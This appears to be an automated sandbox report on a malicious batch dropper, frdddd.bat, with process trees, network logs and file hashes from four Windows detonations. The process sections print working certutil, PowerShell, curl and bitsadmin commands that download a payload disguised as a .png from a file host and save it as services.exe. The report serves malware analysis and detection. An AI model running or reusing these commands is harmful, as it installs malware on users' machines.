Malware Analysis Report

2024-10-16 05:07

Sample ID 240726-v8hpjaxbnd
Target frdddd.bat
SHA256 6cbc3c8e40db05db5086c922bfdfc09eba597d00feb4de442ccc210c11adfdcd
Tags
dropper execution
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

6cbc3c8e40db05db5086c922bfdfc09eba597d00feb4de442ccc210c11adfdcd

Threat Level: Likely malicious

The file frdddd.bat was found to be: Likely malicious.

Malicious Activity Summary

dropper execution

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Download via BitsAdmin

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-26 17:39

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-26 17:39

Reported

2024-07-26 17:51

Platform

win7-20240708-en

Max time kernel

680s

Max time network

691s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\frdddd.bat"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\system32\bitsadmin.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\frdddd.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell -Command "Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('Key accepted!', 'Success')"

C:\Windows\system32\certutil.exe

certutil -urlcache -split -f "https://files.catbox.moe/83dtmm.png" "C:\Users\Admin\AppData\Local\Temp\services.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell -Command "Invoke-WebRequest -Uri 'https://files.catbox.moe/83dtmm.png' -OutFile 'C:\Users\Admin\AppData\Local\Temp\services.exe'"

C:\Windows\system32\bitsadmin.exe

bitsadmin /transfer mydownloadjob /download /priority high "https://files.catbox.moe/83dtmm.png" "C:\Users\Admin\AppData\Local\Temp\services.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 files.catbox.moe udp
US 108.181.20.37:443 files.catbox.moe tcp
US 108.181.20.37:443 files.catbox.moe tcp
US 108.181.20.37:443 files.catbox.moe tcp
US 108.181.20.37:443 files.catbox.moe tcp

Files

memory/2692-4-0x000007FEF460E000-0x000007FEF460F000-memory.dmp

memory/2692-5-0x000000001B640000-0x000000001B922000-memory.dmp

memory/2692-6-0x0000000001F80000-0x0000000001F88000-memory.dmp

memory/2692-7-0x000007FEF4350000-0x000007FEF4CED000-memory.dmp

memory/2692-9-0x000007FEF4350000-0x000007FEF4CED000-memory.dmp

memory/2692-8-0x000007FEF4350000-0x000007FEF4CED000-memory.dmp

memory/2692-10-0x000007FEF4350000-0x000007FEF4CED000-memory.dmp

memory/2692-11-0x000007FEF4350000-0x000007FEF4CED000-memory.dmp

memory/2692-12-0x000007FEF4350000-0x000007FEF4CED000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 33699b0d456ab857c654d32bb2e3d0dd
SHA1 41f8ea34091911ce5bd3bb1ae0001b2b7757afe3
SHA256 856a97eb624bc867818df6621476301d7e5fee700d75ad3d1c60e0e22335c567
SHA512 a443e18f62712d18fa6733382888036ea3440cfcf016827d869421ec5c87dc592de2f4d36d875815c47c4b68b3815a6abc5be5621a70c4c87ddf3cef2a90410d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SUKDE7OPGAIDYLA7PF3Z.temp

MD5 2274ec55bb8524294bd4da2157137a42
SHA1 7ca9c4c80357eaa63a7fc356051808eff70bb445
SHA256 db4f6c51f3188a40d7f633f729530873e4aa6191e466a66f174c9fd880a1d1fe
SHA512 a5d5ab9da17495659b99a8131742f7d659344febe5f6ca596ec5c202389c949387923265879ef2e03a1bce9bdd52d749ff7c7cec627f385fbdec929fe41372c8

memory/1464-18-0x000000001B4E0000-0x000000001B7C2000-memory.dmp

memory/1464-19-0x0000000002340000-0x0000000002348000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-26 17:39

Reported

2024-07-26 17:48

Platform

win10-20240404-en

Max time kernel

373s

Max time network

398s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\frdddd.bat"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\system32\bitsadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\frdddd.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell -Command "Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('Key accepted!', 'Success')"

C:\Windows\system32\certutil.exe

certutil -urlcache -split -f "https://files.catbox.moe/83dtmm.png" "C:\Users\Admin\AppData\Local\Temp\services.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell -Command "Invoke-WebRequest -Uri 'https://files.catbox.moe/83dtmm.png' -OutFile 'C:\Users\Admin\AppData\Local\Temp\services.exe'"

C:\Windows\system32\bitsadmin.exe

bitsadmin /transfer mydownloadjob /download /priority high "https://files.catbox.moe/83dtmm.png" "C:\Users\Admin\AppData\Local\Temp\services.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 files.catbox.moe udp
US 108.181.20.37:443 files.catbox.moe tcp
US 108.181.20.37:443 files.catbox.moe tcp
US 108.181.20.37:443 files.catbox.moe tcp
US 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 209.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 99.58.20.217.in-addr.arpa udp

Files

memory/4164-3-0x00007FFA2DF73000-0x00007FFA2DF74000-memory.dmp

memory/4164-5-0x000001867BBB0000-0x000001867BBD2000-memory.dmp

memory/4164-6-0x00007FFA2DF70000-0x00007FFA2E95C000-memory.dmp

memory/4164-9-0x000001867BEA0000-0x000001867BF16000-memory.dmp

memory/4164-10-0x00007FFA2DF70000-0x00007FFA2E95C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lxc0pd4w.ekv.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4164-41-0x00007FFA2DF70000-0x00007FFA2E95C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 900713b658f108100bb7aa144134dbca
SHA1 7a05dd4d5cd03542c5187c8a3036f30b9d79daf0
SHA256 c59ad3c5b09e5adab5c6d20e70fc87edce830a1e696ea2b49b51fe99ae084da8
SHA512 85a5b109a01035e1ac4dec839f6b84bd6a141c6938e51f78915748a9a593b011367f1d8c7c72060a986f993ca3206fde30929b18be8d51d60cc1525a73613f8d

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 82bf624e242a520bea827e1597a3b6c3
SHA1 44b39896a849a7a8e959be51b63b260d2a5c2703
SHA256 8b57b809a4849de8c8341d0d1fcfddf0cb39c81f28a081fe95b0f0aa48ad89fa
SHA512 df229348ee2496d9456235ba0aef84431e66be0ec0a5baa7afa5bb7255d527ae632a8fa7c603e3b2bb137f2175728fe678dc745fc885b49dbf1178615476a774

Analysis: behavioral3

Detonation Overview

Submitted

2024-07-26 17:39

Reported

2024-07-26 17:47

Platform

win10v2004-20240709-en

Max time kernel

439s

Max time network

443s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\frdddd.bat"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\system32\bitsadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\frdddd.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell -Command "Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('Key failed!', 'Error')"

C:\Windows\system32\certutil.exe

certutil -urlcache -split -f "https://files.catbox.moe/83dtmm.png" "C:\Users\Admin\AppData\Local\Temp\services.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell -Command "Invoke-WebRequest -Uri 'https://files.catbox.moe/83dtmm.png' -OutFile 'C:\Users\Admin\AppData\Local\Temp\services.exe'"

C:\Windows\system32\curl.exe

curl -o "C:\Users\Admin\AppData\Local\Temp\services.exe" "https://files.catbox.moe/83dtmm.png"

C:\Windows\system32\bitsadmin.exe

bitsadmin /transfer mydownloadjob /download /priority high "https://files.catbox.moe/83dtmm.png" "C:\Users\Admin\AppData\Local\Temp\services.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 files.catbox.moe udp
US 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp
US 8.8.8.8:53 147.142.123.92.in-addr.arpa udp
US 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 25.140.123.92.in-addr.arpa udp
US 108.181.20.37:443 files.catbox.moe tcp
IE 52.111.236.23:443 tcp
US 8.8.8.8:53 40.58.20.217.in-addr.arpa udp
US 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 30.73.42.20.in-addr.arpa udp

Files

memory/2616-0-0x00007FF9109F3000-0x00007FF9109F5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aqc3mlmu.fba.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2616-10-0x000001594BB20000-0x000001594BB42000-memory.dmp

memory/2616-11-0x00007FF9109F0000-0x00007FF9114B1000-memory.dmp

memory/2616-12-0x00007FF9109F0000-0x00007FF9114B1000-memory.dmp

memory/2616-15-0x000001594B7D0000-0x000001594B9EC000-memory.dmp

memory/2616-16-0x00007FF9109F0000-0x00007FF9114B1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 614f88cf39eb3223246afec4bf1463b4
SHA1 74d738ee6fdada75ac1ef1645073005e3f6b6cfb
SHA256 021636a793f57f23b16356c5b84fdf0122fdcadfaba305e4df4654bfbfa442bd
SHA512 84a7151e0471e659699a15c25d9063af1975e79bb5f23de6b3bc0d3b96cd161d70ad35f6acdbc8123b38bac9918df8b202bd6f1f4ca8061919074973e6063a77

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 545200acaf2c8f78ae532a89dc92847f
SHA1 ed204ca3305153883b4a6452d3a51ba5a6d145e1
SHA256 70df64fb0f6dd58a197b24edda7d79e43d9f5326dab3559e210ca48f89fef2f2
SHA512 e0eb48db79189689d56b2a845d416b78e4d2dd9f931423f8cfc28ed4d2f032e7b0f192f17e294eddb259f85de99ff8debdc5ef8f86843c50fc8134ee02b178e1

Analysis: behavioral4

Detonation Overview

Submitted

2024-07-26 17:39

Reported

2024-07-26 17:42

Platform

win11-20240709-en

Max time kernel

147s

Max time network

152s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\frdddd.bat"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\system32\bitsadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\frdddd.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell -Command "Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('Key failed!', 'Error')"

C:\Windows\system32\certutil.exe

certutil -urlcache -split -f "https://files.catbox.moe/83dtmm.png" "C:\Users\Admin\AppData\Local\Temp\services.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell -Command "Invoke-WebRequest -Uri 'https://files.catbox.moe/83dtmm.png' -OutFile 'C:\Users\Admin\AppData\Local\Temp\services.exe'"

C:\Windows\system32\curl.exe

curl -o "C:\Users\Admin\AppData\Local\Temp\services.exe" "https://files.catbox.moe/83dtmm.png"

C:\Windows\system32\bitsadmin.exe

bitsadmin /transfer mydownloadjob /download /priority high "https://files.catbox.moe/83dtmm.png" "C:\Users\Admin\AppData\Local\Temp\services.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 files.catbox.moe udp
US 108.181.20.37:443 files.catbox.moe tcp
US 108.181.20.37:443 files.catbox.moe tcp
US 108.181.20.37:443 files.catbox.moe tcp
N/A 127.0.0.1:49827 tcp
US 108.181.20.37:443 files.catbox.moe tcp
US 108.181.20.37:443 files.catbox.moe tcp

Files

memory/2012-0-0x00007FF82AFF3000-0x00007FF82AFF5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xgowykvb.lxy.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2012-9-0x0000029D7C1C0000-0x0000029D7C1E2000-memory.dmp

memory/2012-10-0x00007FF82AFF0000-0x00007FF82BAB2000-memory.dmp

memory/2012-11-0x00007FF82AFF0000-0x00007FF82BAB2000-memory.dmp

memory/2012-12-0x00007FF82AFF0000-0x00007FF82BAB2000-memory.dmp

memory/2012-15-0x00007FF82AFF0000-0x00007FF82BAB2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f33a85941bcb1090d75289d34035310
SHA1 b24a3c2248b575a78c066866768c6a7fb9f8e06c
SHA256 169bb5671a611478cb7dc58e7d1b01a5ce2d354591c4a63e7b191b6e7b6dee6c
SHA512 d6065d75737f4016d876cb4ada85b196b1be70e06b552ebae0d51f7b84a01e87151ae81ba3aa584bfe28ce4df69f62e6a37d3918d2b3b02a7b3ebfb3bf7540b5

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 962574549d8b04e5eeda54c5284808d0
SHA1 d37b5af76b44a47e4ce09ea3a3421408a901b7eb
SHA256 063fe32bc457964b5f53515b749bac5b7012469ce0d0b0fd5ece65206b283060
SHA512 7354c6d53d1bc28ad9d027def0e2335a7fab5e02473bf056687dcfc0e3e7b2ad0b3314772747e9b2753d1314ee84ffa220e3e7e310c519d4adede2bba5f1aff6